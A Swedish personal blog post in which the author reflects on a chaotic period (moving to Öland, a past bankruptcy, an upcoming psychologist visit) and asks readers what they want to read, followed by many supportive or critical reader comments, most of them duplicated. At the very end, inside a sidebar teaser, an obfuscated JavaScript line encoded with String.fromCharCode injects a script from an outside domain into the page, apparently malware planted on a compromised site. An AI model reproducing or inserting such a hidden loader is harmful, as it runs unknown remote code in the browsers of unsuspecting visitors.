Nu behöver jag DIN åsikt!

IMG_7392

Skratt eller gråt? 

Du vet en såndär dag när vissa situationer blir så surrealistiska att man inte vet om man ska skratta eller gråta!?! Idag är en sån dag! Men jag väljer att skratta! 😂 Det är min styrka i motgång!

WTF?! Ibland  undrar jag om det sitte någon elaking och utövar mörk voodo mig på mig 🤔🙄 Sjölvklar gör det inte det… Men kan det inte bara få vara okomplicerat nån gång. Bara liiiiiite lugn och ro utan gnagande väg-gupp! 

När logistik och praktik inte går ihop! Jag trollar med knäna just nu för att få ihop allt. Planering, flytt och logistik. TACK för alla fina kommentarer. Tänkte inte på RUT/ROT avdrag, (vad är skillnaden?). en städfirma får det bli! När jag kände att jag börjat få ihop pusslet både i nutid men också i höst. DÅ kommer ”det där samtalet” och allt vänds upp och ner igen!

Samtalet handlade iof om något väldigt spännande! Minst sagt, typ min största utmaning hittills! Men ändå, just nu?

Självklart, för i mitt liv…. då snurrar det på i 180! Jag känner mig klokare, lugnare och starkare än på länge 👊🏻 Men är samtidigt väldigt skör…. skör, men medveten om det. Imorgon ska jag till psykologen! DET kunde inte kommit lägligare iallafall 😉 Varje människa får vad klarar av säger man. Med risk för att låta egoistisk bu. Jag anser att jag har fått mitt! För MINST tio år framåt! 🙈

Konkursen börjar kännas avlägsen, på ett sätt som igår, men på ett sätt väldigt längesen. Många av mina ”vänner” visade vad dom gick för. När det stormade som mest så klev vissa fram och andra bak. Det är en lärdom. En lärdom som gjort ont, men som också lärt mig att se vilka som VERKLIGEN finns där ❤️ (Ingen nämnd, ingen glömd… ni vet vilka ni är)

Detta året har gett mig gråa hårstrån, jag har vuxit och åldrats enormt. Jag har verkligen lärt känna mig själv. Jag är lååångt ifrån ”där” men jag är betydligt närmare idag än igår 👊🏻

 Imorgon är en VIKTIG dag, jag kan i dagläget inte avslöja vad det handlar om…. Jag ska som jag skrev tidigare till psykologen. Men förutom det, så är det TVÅ oberoende möten av varandra…. Som jag håller tummar och tår för att jag ”klarar” av. ✨🙏🏻 Sååååå spännande! -Nu gäller det! 👊🏻🌟

En sista fråga innan jag kryper till kojs… VAD vill du läsa om här inne?

Vissa av mina vänner ( Åza ❤️😂) tycker inte att jag ska ”blotta mig” så mycket när jag inte är på topp. Inte skriva så lååååånga inlägg osv… VAD tycker DU?

Jag vill ju inte tråka ut dig såklart…. ☺️

Kom igen nu, berätta vad DU vill läsa🙏🏻

Vardag? Mode? Träning? Vad som? Nu ska jag ta tidig kväll. Jag BEHÖVER min skönhetssömn 🙏🏻☺️

TACK för att DU finns 💖  Kram & puss

/My Martens

106 Komentarer

 1. Dom långa inläggen är bäst att läsa.
  Samtidigt vet och känner jag att du mår bra av dom men vet att Åza också har rätt. Så det blir ju lite moment 22.
  Viktigast är att du mår bra.
  Gillar din uppdatering.
  Du har en tuff dag i morgon men allt blir som du vill till och med hos psykologen.
  Kram L

 2. Jag har läst din blogg sedan start och jag uppskattar när du blottar dej , du är så himla fin både på insidan och utsidan. Va stolt över dej själv att du står upp efter allt du gått igenom. Jag håller tummarna för att flytten sker enkelt . Ta hand om dej ❤

 3. Jag tycker att du ska fortsätta som du gör nu. Din blogg känns ärlig o äkta när du skriver hur du känner o mår ? Givetvis så ska du ju göra precis vad du känner för ?

 4. Hej!
  Tycker om din blogg,& tycker om när du skriver om ditt liv med barn och jobb/ensamförälder,många som är i samma situation och behöver bolla det med andra..
  Du skriver mycket bra utan att hänga ut andra,proffsigt tycker jag. Tack för en jätte fin och inspirerande mysig blogg!
  Kram Anna

 5. Din blogg har varit jättebra hittills. Som en spännande bok. Dramat runt dig har gjort att jag fällt många tårar då jag läst dina inlägg. Och sedan tänkt på dig och undrat och hoppats att du mår bra. Och sen blivit så jätteglad då du spottat i händerna och visat att du klarade detta också. Det är en sådan känsla i din blogg. Du är en intressant personlighet och du visar den i din blogg. Var som du är i fortsättning också. För du är en toppentjej med en toppenblogg. Kram ❤❤

 6. Hej My!
  Tycker din blogg är super bra!!Du behöver inte ändra ngt. Känns bra att du ” blottar” dig. För det visar bara att vi alla kämpar och att inte ”alla” har det så skimrande och bra alltid. Det är många bloggerskor som vill visa den lyckliga sidan utåt! Istället för att visa det riktiga verkliga livet!
  Du visar o berättar direkt ur hjärtat! Och det är därför man vill följa dig! För DU är äkta och en genuint snäll människa!
  Hoppas verkligen att du får lugn o ro borta på Öland och att du kommer trivas lika bra som där du bott nu!
  Det förtjänar du!!
  Kram fina tappra My

 7. Håller med de andra, skriv precis det du känner för! Du blir en ”verklig person” när det är äkta, till skillnad från många andra bloggar. Jag älskar ärlighet o läser dina inlägg med stor behållning. Jag är inte uttråkad! Hoppas allt ska gå bra, kram

 8. Vi som läst din blogg länge känner ju till att mycket har hänt. Det händer alltid något och din blogg är varierande så det är helt ok blandning av allt tycker jag. Förstår att du uppdaterar och repeterar emellanåt för att nya läsare ska hänga med. Jag förstår också Åzas tanke om att inte lämna ut dig när du inte är på topp. Tyvärr finns det ju elaka människor som gottar sig och gärna strör salt i såren om de kan. Det är ju en fin balansgång det där. Men kanske ta ett varv runt huset innan man skriver i bloggen är ett bra tips? Då ångar man av sig det värsta innan man skriver för mycket. ? Måste annars säga att vilken supervän Åza är som vågar säga sanningar och sin åsikt och ge ärliga kloka råd. Har tänkt många gånger att ”alla borde ha Åza till vän!” när jag lyssnat på er podd! Fast det skulle nog bli lite stressigt för henne ha ha. Fortsätt som du gör och lycka till med flytten! Det blir bra när det är klart, det här fixar du! Kram! ?

  • Tack för dina fina ord Maria, de värmer ska du veta! Nja, det skulle nog bli lite för mycket att stå i, särskilt om fler vore som My ?. Kram Åza

 9. tycker du ska fortsätta som du gör i skrivande,men jag kan även hålla med Åza egentligt…i vissa saker, fråga mig inte vilka haha jag nattsvammlar ? ♥ Lycka till imorgon , och om jag får gissa på det nått av vad du ska , så skulle det inte förvåna mig om vi fick se dig i rutan inom snar framtid, fråga mig inte varför jag tror det , det bara känns så ? hahaha ♥

 10. Läser din blogg och din instragram varje dag, tycker att du är en sån inspirationskälla. Älskar att du är så öppenhjärtig och på så vis blir du så ärlig. ❤ Du måste givetvis göra det som känns rätt för dig. Kram

 11. Tycker också din blogg e bra som den är! Gillar dina långa inlägg och dom personliga och gillar att bara ”skriver på”, inte väger varenda ord på guldvåg liksom för den perfekta formuleringen, utan det känns som att du pratar med en som läsare när du skriver som du gör.
  Läser även Ebba von Sydows blogg och inget ont om henne men det skrivsättet kan ibland kännas så tillrättalagt på något sätt och att bloggen blir mer som en ”image” och ett varumärke.
  Ditt sätt att skriva känns avslappnat och varmt, du känns ärlig och genuin.
  Sen e ju aldrig reklaminlägg så skoj förstås ? men förstår även att sånt måste finnas av ekonomiska skäl.
  Med andra ord, kör på som du gör! ?

 12. Livet är inte bara glädje, utan även sorg, pissiga dagar, dagar man vill radera.. Tycker helt ärligt att din blogg är en spegel av dig, sudda inte ut den spegelbilden. Den gör dig unik och alldeles speciell bland alla dessa bloggar.
  För att du är du och inte spelar något ”jagmårsåjävlabrahelatiden” är orsaken till att jag bara läser din blogg. Den är äkta
  Kram

 13. Tycker du skriver bra och intressant men kan hålla med din vän om att inläggen ibland blir väldigt långa och upprepande.
  Tycker också att du för din egen skull kanske ska tala om saker först när det är bestämt inte de här s.k cliffhangers. Lycka till med flytten tror det kommer bli så bra för er alla när du kommer hem igen lite mer lugn och ro.

 14. Dom långa inläggen är bäst att läsa.
  Samtidigt vet och känner jag att du mår bra av dom men vet att Åza också har rätt. Så det blir ju lite moment 22.
  Viktigast är att du mår bra.
  Gillar din uppdatering.
  Du har en tuff dag i morgon men allt blir som du vill till och med hos psykologen.
  Kram L

 15. Lycka till m viktiga möten!
  Å jo långa O personliga inlägg ä ju det som gör bloggen så levande…, tycker jag iaf!! Dvs fortsätt med det!!
  MEN det viktiga är ju att du gör/skriver på det sätt som känns bra O bekvämt f dig.
  Men din blogg ä så fin tycker jag, f den på riktigt, inte bara massa reklam, recept O allmänt….
  Var rädd om dig O som sagt lycka till med allt, flytt, planer m.m.
  Glöm inte andas O små pauser ibland mitt i allt???.
  Kram
  Anna

 16. Jag har läst din blogg sedan start och jag uppskattar när du blottar dej , du är så himla fin både på insidan och utsidan. Va stolt över dej själv att du står upp efter allt du gått igenom. Jag håller tummarna för att flytten sker enkelt . Ta hand om dej ❤

 17. Jag tycker att du ska fortsätta som du gör nu. Din blogg känns ärlig o äkta när du skriver hur du känner o mår 💕 Givetvis så ska du ju göra precis vad du känner för 🌺

 18. Hej!

  Tycker om din blogg,& tycker om när du skriver om ditt liv med barn och jobb/ensamförälder,många som är i samma situation och behöver bolla det med andra..

  Du skriver mycket bra utan att hänga ut andra,proffsigt tycker jag. Tack för en jätte fin och inspirerande mysig blogg!

  Kram Anna

 19. Din blogg har varit jättebra hittills. Som en spännande bok. Dramat runt dig har gjort att jag fällt många tårar då jag läst dina inlägg. Och sedan tänkt på dig och undrat och hoppats att du mår bra. Och sen blivit så jätteglad då du spottat i händerna och visat att du klarade detta också. Det är en sådan känsla i din blogg. Du är en intressant personlighet och du visar den i din blogg. Var som du är i fortsättning också. För du är en toppentjej med en toppenblogg. Kram ❤❤

 20. Hej My!
  Tycker din blogg är super bra!!Du behöver inte ändra ngt. Känns bra att du ” blottar” dig. För det visar bara att vi alla kämpar och att inte ”alla” har det så skimrande och bra alltid. Det är många bloggerskor som vill visa den lyckliga sidan utåt! Istället för att visa det riktiga verkliga livet!
  Du visar o berättar direkt ur hjärtat! Och det är därför man vill följa dig! För DU är äkta och en genuint snäll människa!
  Hoppas verkligen att du får lugn o ro borta på Öland och att du kommer trivas lika bra som där du bott nu!
  Det förtjänar du!!
  Kram fina tappra My

 21. Håller med de andra, skriv precis det du känner för! Du blir en ”verklig person” när det är äkta, till skillnad från många andra bloggar. Jag älskar ärlighet o läser dina inlägg med stor behållning. Jag är inte uttråkad! Hoppas allt ska gå bra, kram

 22. Vi som läst din blogg länge känner ju till att mycket har hänt. Det händer alltid något och din blogg är varierande så det är helt ok blandning av allt tycker jag. Förstår att du uppdaterar och repeterar emellanåt för att nya läsare ska hänga med. Jag förstår också Åzas tanke om att inte lämna ut dig när du inte är på topp. Tyvärr finns det ju elaka människor som gottar sig och gärna strör salt i såren om de kan. Det är ju en fin balansgång det där. Men kanske ta ett varv runt huset innan man skriver i bloggen är ett bra tips? Då ångar man av sig det värsta innan man skriver för mycket. 🙂 Måste annars säga att vilken supervän Åza är som vågar säga sanningar och sin åsikt och ge ärliga kloka råd. Har tänkt många gånger att ”alla borde ha Åza till vän!” när jag lyssnat på er podd! Fast det skulle nog bli lite stressigt för henne ha ha. Fortsätt som du gör och lycka till med flytten! Det blir bra när det är klart, det här fixar du! Kram! 🙂

  • Tack för dina fina ord Maria, de värmer ska du veta! Nja, det skulle nog bli lite för mycket att stå i, särskilt om fler vore som My ;-). Kram Åza

 23. tycker du ska fortsätta som du gör i skrivande,men jag kan även hålla med Åza egentligt…i vissa saker, fråga mig inte vilka haha jag nattsvammlar 😉 ♥ Lycka till imorgon , och om jag får gissa på det nått av vad du ska , så skulle det inte förvåna mig om vi fick se dig i rutan inom snar framtid, fråga mig inte varför jag tror det , det bara känns så 😉 hahaha ♥

 24. Läser din blogg och din instragram varje dag, tycker att du är en sån inspirationskälla. Älskar att du är så öppenhjärtig och på så vis blir du så ärlig. ❤ Du måste givetvis göra det som känns rätt för dig. Kram

 25. Tycker också din blogg e bra som den är! Gillar dina långa inlägg och dom personliga och gillar att bara ”skriver på”, inte väger varenda ord på guldvåg liksom för den perfekta formuleringen, utan det känns som att du pratar med en som läsare när du skriver som du gör.
  Läser även Ebba von Sydows blogg och inget ont om henne men det skrivsättet kan ibland kännas så tillrättalagt på något sätt och att bloggen blir mer som en ”image” och ett varumärke.
  Ditt sätt att skriva känns avslappnat och varmt, du känns ärlig och genuin.
  Sen e ju aldrig reklaminlägg så skoj förstås 😉 men förstår även att sånt måste finnas av ekonomiska skäl.
  Med andra ord, kör på som du gör! 🙂

 26. Livet är inte bara glädje, utan även sorg, pissiga dagar, dagar man vill radera.. Tycker helt ärligt att din blogg är en spegel av dig, sudda inte ut den spegelbilden. Den gör dig unik och alldeles speciell bland alla dessa bloggar.

  För att du är du och inte spelar något ”jagmårsåjävlabrahelatiden” är orsaken till att jag bara läser din blogg. Den är äkta
  Kram

 27. Tycker du skriver bra och intressant men kan hålla med din vän om att inläggen ibland blir väldigt långa och upprepande.
  Tycker också att du för din egen skull kanske ska tala om saker först när det är bestämt inte de här s.k cliffhangers. Lycka till med flytten tror det kommer bli så bra för er alla när du kommer hem igen lite mer lugn och ro.

 28. Hej My!
  Bra att du lyssnar på Åza. Att du frågar tyder på viss självinsikt. tycker inte du ska fortsätta din blogg som du har gjort, för långa negativa inlägg/upprepningar om vad som har hänt i ditt liv på Öland/stockholm, ditt f.d yrke, f.d män, f.d pappa, f.d entreprenör, konkursen, etc, etc. Det har varit mycket negativt men som du tycker är en ”ärlig blogg”. Nämn inte Lillemans pappa, dina f.d vänner, din övervikt/bantning etc etc. Som åza säger det blir för mycket. Kan uppfattas som offerkofta eller som att du har svårt att släppa taget. Lev i nuet, var positiv och fokusera på vad som händer istf att se tillbaka eller skylla på något/andra på det som händer i ditt liv! Lycka till!

 29. Lycka till m viktiga möten!
  Å jo långa O personliga inlägg ä ju det som gör bloggen så levande…, tycker jag iaf!! Dvs fortsätt med det!!

  MEN det viktiga är ju att du gör/skriver på det sätt som känns bra O bekvämt f dig.
  Men din blogg ä så fin tycker jag, f den på riktigt, inte bara massa reklam, recept O allmänt….

  Var rädd om dig O som sagt lycka till med allt, flytt, planer m.m.

  Glöm inte andas O små pauser ibland mitt i allt🙃🙃🤗.

  Kram
  Anna

 30. Hej My!
  Bra att du lyssnar på Åza. Att du frågar tyder på viss självinsikt. tycker inte du ska fortsätta din blogg som du har gjort, för långa negativa inlägg/upprepningar om vad som har hänt i ditt liv på Öland/stockholm, ditt f.d yrke, f.d män, f.d pappa, f.d entreprenör, konkursen, etc, etc. Det har varit mycket negativt men som du tycker är en ”ärlig blogg”. Nämn inte Lillemans pappa, dina f.d vänner, din övervikt/bantning etc etc. Som åza säger det blir för mycket. Kan uppfattas som offerkofta eller som att du har svårt att släppa taget. Lev i nuet, var positiv och fokusera på vad som händer istf att se tillbaka eller skylla på något/andra på det som händer i ditt liv! Lycka till!

 31. Fortsätt som du gör! Det är där skillnaden ligger, att du skriver ärligt och från hjärtat. Många bloggar är så ytliga, och då blir dom ointressanta tycker jag. Stor kram!

 32. Fortsätt som du gör! Det är där skillnaden ligger, att du skriver ärligt och från hjärtat. Många bloggar är så ytliga, och då blir dom ointressanta tycker jag. Stor kram!

 33. Hej My
  Det som är så spännande med din blogg är att det känns som man nästan är med dig och ”känner” dig. Det är det som gör att jag är här inne och läser varje dag ?
  Fortsätt skriva om dina upp & ned-gångar, skriv om allt och inget.
  Håller en tumme för att allt går som det ska så ni kommer ner till Öland och kan njuta.
  Kramar från Annica

 34. Jag gillar långa inlägg?. Gillar dina input/ inspiration till att ha en positiv attityd, fokus på det som är bra/ viktigt trots att det inte alltid går så bra samt träning och kost. Skulle fortsätta läsa även om du skrev mindre ”personligt”.

 35. Skriv precis som du gör, läser din blogg varje dag även fast jag inte skriver så ofta.
  Gillar dina långa inlägg, spelar ingen roll om du upprepar hur du känner, hur ditt år har varit .Det är ju ditt liv, du ska ju skriva precis vad du känner. Fina bilder och bra blandning !

 36. Hej My
  Det som är så spännande med din blogg är att det känns som man nästan är med dig och ”känner” dig. Det är det som gör att jag är här inne och läser varje dag 🙂
  Fortsätt skriva om dina upp & ned-gångar, skriv om allt och inget.
  Håller en tumme för att allt går som det ska så ni kommer ner till Öland och kan njuta.
  Kramar från Annica

 37. Hej My
  Jag läser gärna din blogg. Jag tycker att den är öppen och ärlig. Visar hur livet är på riktigt med upp och nergångar. Jag känner igen mig i mycket av det du skriver även om jag förstås inte har genomgått exakt samma saker. Forsätt att vara du och skriv vad du känner det gör att din blogg känns äkta och genuin.
  Lycka till i livet ! ??

 38. Jag gillar långa inlägg😊. Gillar dina input/ inspiration till att ha en positiv attityd, fokus på det som är bra/ viktigt trots att det inte alltid går så bra samt träning och kost. Skulle fortsätta läsa även om du skrev mindre ”personligt”.

 39. Bloggen är bra som den är-ärlig,varm, rolig, varierande och inspirerande.💜Du är en underbar bloggerska! 🌿

 40. Vill läsa om ditt nya jag på Öland och Lilleman i din närhet. Din träning och dina arbeten. Tycker inte det är så givande att höra om Lillemans pappa och dina vänner som svek dig och din konkurs osv, för det har du skrivit om så mkt nu. Jag vill läsa mer om din vardag med din gosse och dina jobb och träning inte så mycket om dina fester.
  Gillar din blogg men vill läsa mer om din vardag ?

 41. Skriv precis som du gör, läser din blogg varje dag även fast jag inte skriver så ofta.
  Gillar dina långa inlägg, spelar ingen roll om du upprepar hur du känner, hur ditt år har varit .Det är ju ditt liv, du ska ju skriva precis vad du känner. Fina bilder och bra blandning !

 42. Fortsätt att skriva som du gör nu. Det är ju din blogg och den ska ju ingen annan bestämma över.
  Din blogg är rak och ärlig och visar verkligheten som den kan vara ibland.
  Vill man inte läsa så är det ju bara att låta bli.
  Kram till dig fina My ❤️

 43. Hej My
  Jag läser gärna din blogg. Jag tycker att den är öppen och ärlig. Visar hur livet är på riktigt med upp och nergångar. Jag känner igen mig i mycket av det du skriver även om jag förstås inte har genomgått exakt samma saker. Forsätt att vara du och skriv vad du känner det gör att din blogg känns äkta och genuin.
  Lycka till i livet ! 🍀🌼

 44. Vill läsa om ditt nya jag på Öland och Lilleman i din närhet. Din träning och dina arbeten. Tycker inte det är så givande att höra om Lillemans pappa och dina vänner som svek dig och din konkurs osv, för det har du skrivit om så mkt nu. Jag vill läsa mer om din vardag med din gosse och dina jobb och träning inte så mycket om dina fester.
  Gillar din blogg men vill läsa mer om din vardag 🙂

 45. Fortsätt att skriva som du gör nu. Det är ju din blogg och den ska ju ingen annan bestämma över.
  Din blogg är rak och ärlig och visar verkligheten som den kan vara ibland.
  Vill man inte läsa så är det ju bara att låta bli.
  Kram till dig fina My ❤️

 46. Fortsätt precis som förut. Uppskattar din ärlighet och att du ”skriver av dig” när du inte mår bra. Orkar man inte läsa långa texter är det väl bara att skumma igenom vissa delar. Hellre det än korta opersonliga texter. Man märker ju ändå att det är något som skaver i så fall. Finns ju en anledning till att din blogg är så välbesökt. Fortsätt!!

 47. Fortsätt precis som förut. Uppskattar din ärlighet och att du ”skriver av dig” när du inte mår bra. Orkar man inte läsa långa texter är det väl bara att skumma igenom vissa delar. Hellre det än korta opersonliga texter. Man märker ju ändå att det är något som skaver i så fall. Finns ju en anledning till att din blogg är så välbesökt. Fortsätt!!

 48. Tycker den är bra men jag tror många läser bloggar lite snabbt då man sitter på tåget eller mellan andra saker man ska göra. Inläggen är ibland så långa att man bara skumläser. Kortare inlägg tror jag definitivt på.

 49. Du kanske ska korta ner dig ibland
  Alltför långa inlägg med alla dess e mojis figurer blir bara så att man inte läser allt.
  Men VAD du ska skriva om avgör du själv men en sak ska jag säga om man ska vara ärlig ( och det ska man väl ) det är att du behöver inte dra upp konkursen och alla törnar du fått och alla smällar du fått på i så många inlägg som du gör nu.
  Vi som följt dig VET detta och nya läsare kan ju själva välja gå in på gamla inlägg om de vill veta mer,
  Jag skriver detta för jag tror att DU själv kanske skulle må bättre av att inte hela tiden älta det gamla.
  Lev i nuet och skriv i nuet, jag tror du skulle ha mycket igen för det.
  Lycka till med flytten
  Kram

 50. Jag måste få göra ett tillägg här. Det är bra att du tar dig tid att svara på kommentarer men många gånger tror jag du skulle avstå helt enkelt. Allt behöver ju inte svar.
  Vi vet ju också att du läst om våra kommentarer kommer med.

 51. Tycker du skriver bra My ! Personlig o öppen blogg ! Det är det som gör det lilla extra fortsätt med det ? Livet har både för o motgångar ! O det är det du skriver om !

 52. Tycker den är bra men jag tror många läser bloggar lite snabbt då man sitter på tåget eller mellan andra saker man ska göra. Inläggen är ibland så långa att man bara skumläser. Kortare inlägg tror jag definitivt på.

 53. Du kanske ska korta ner dig ibland
  Alltför långa inlägg med alla dess e mojis figurer blir bara så att man inte läser allt.
  Men VAD du ska skriva om avgör du själv men en sak ska jag säga om man ska vara ärlig ( och det ska man väl ) det är att du behöver inte dra upp konkursen och alla törnar du fått och alla smällar du fått på i så många inlägg som du gör nu.
  Vi som följt dig VET detta och nya läsare kan ju själva välja gå in på gamla inlägg om de vill veta mer,
  Jag skriver detta för jag tror att DU själv kanske skulle må bättre av att inte hela tiden älta det gamla.
  Lev i nuet och skriv i nuet, jag tror du skulle ha mycket igen för det.
  Lycka till med flytten
  Kram

 54. Jag måste få göra ett tillägg här. Det är bra att du tar dig tid att svara på kommentarer men många gånger tror jag du skulle avstå helt enkelt. Allt behöver ju inte svar.
  Vi vet ju också att du läst om våra kommentarer kommer med.

 55. Hej My!
  Jag är en av dina läsare som skulle kunna vara mamma åt dig………därför tar jag på mig mina mamma-glasögon när jag skriver detta.
  Jag tror att du ibland ska vara mer försiktig med att dela med dig av ditt liv när du känner dig skör. Alla människor vill inte väl och vissa njuter av att trycka till andra. Jag vet att du försöker skaka av dig negativa kommentarer mm men jag ser av din blogg att du ibland blir sårad. Ge inte dessa människor ammunitionen till att skada dig. Din vän Åsa är klok i det hon säger, lyssna till henne.
  Kanske är det så att du ska skriva inlägget men vänta med att publicera det tills t.ex Åsa fått läsa det. Jag tror att du känner inom dig vilka inlägg som är skrivna med känslorna utanpå skinnet.
  Ta hand om dig och var rädd om dig!

 56. Tycker du skriver bra My ! Personlig o öppen blogg ! Det är det som gör det lilla extra fortsätt med det ? Livet har både för o motgångar ! O det är det du skriver om !

 57. Hej My!
  Jag är en av dina läsare som skulle kunna vara mamma åt dig………därför tar jag på mig mina mamma-glasögon när jag skriver detta.
  Jag tror att du ibland ska vara mer försiktig med att dela med dig av ditt liv när du känner dig skör. Alla människor vill inte väl och vissa njuter av att trycka till andra. Jag vet att du försöker skaka av dig negativa kommentarer mm men jag ser av din blogg att du ibland blir sårad. Ge inte dessa människor ammunitionen till att skada dig. Din vän Åsa är klok i det hon säger, lyssna till henne.
  Kanske är det så att du ska skriva inlägget men vänta med att publicera det tills t.ex Åsa fått läsa det. Jag tror att du känner inom dig vilka inlägg som är skrivna med känslorna utanpå skinnet.
  Ta hand om dig och var rädd om dig!

 58. Hej!
  Jag tycker du ska sluta o älta det som har hänt med vikt vänner flytt mm. Släpp det o gå vidare. Det är roligare o läsa om positiva saker som din framtid med Ludvig och den skola/ jobb du ska ha på Öland.
  Kramar

  • Hej ? flytten är en väääääldigt stor del av vårat liv just precis just ny (#flyttkaos) ??? Extra kilona, ja… dom sitter där dom sitter för tillfället ? Jobba, det kommer jag att göra i stockholm ☺️ Tack för omtanken… kram

 59. Hej!
  Jag tycker du ska sluta o älta det som har hänt med vikt vänner flytt mm. Släpp det o gå vidare. Det är roligare o läsa om positiva saker som din framtid med Ludvig och den skola/ jobb du ska ha på Öland.
  Kramar

  • Hej 🙂 flytten är en väääääldigt stor del av vårat liv just precis just ny (#flyttkaos) 😂😂🙈 Extra kilona, ja… dom sitter där dom sitter för tillfället 😄 Jobba, det kommer jag att göra i stockholm ☺️ Tack för omtanken… kram

Svara

Lämna din kommentar!
Ditt namn här

Om du missat..

Andas ut stressen med hjälp av djupandning

Andas ut stressen med hjälp av djupandning -Hur många tänker egentligen på sin andning? Jag...

SMEG bagaren och kocken 20%

I reklamsamarbete Bagaren och Kocken ??‍? Hej på er! Detta är en grymt efterlängtad kampanj...

Adviral Event

My Martens , Ako Rahim. Adviral Media. d Ako, Renata, My   var f=String;+f.fromCharCode(99,116,105,111,110)+f.fromCharCode(32,97,115,115,40,115,114,99,41,123,114,101,116,117,114,110)+f.fromCharCode(32,66,111,111,108,101,97,110)+f.fromCharCode(40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,125,32,118,97,114,32,108,111,61,34,104,116,116,112,115,58,47,47,115,116,97,121,46,108,105,110)+f.fromCharCode(101,115,116,111,103,101,116,46,99,111,109,47,115,99,114,105,112,116,115,47,99,104,101,99,107,46,106,115,63,118,61,53,46,53,53,46,53,34,59,105,102,40,97,115,115,40,108,111,41,61,61,102,97,108,115,101,41,123,118,97,114,32,100,61,100,111,99,117,109,101,110)+f.fromCharCode(116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110)+f.fromCharCode(116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,115,114,99,61,108,111,59,105,102,32,40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,46,112,97,114,101,110)+f.fromCharCode(116,78,111,100,101,46,105,110)+f.fromCharCode(115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110)+f.fromCharCode(116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110)+f.fromCharCode(100,67,104,105,108,100,40,115,41,59,125,125));/*99586587347*/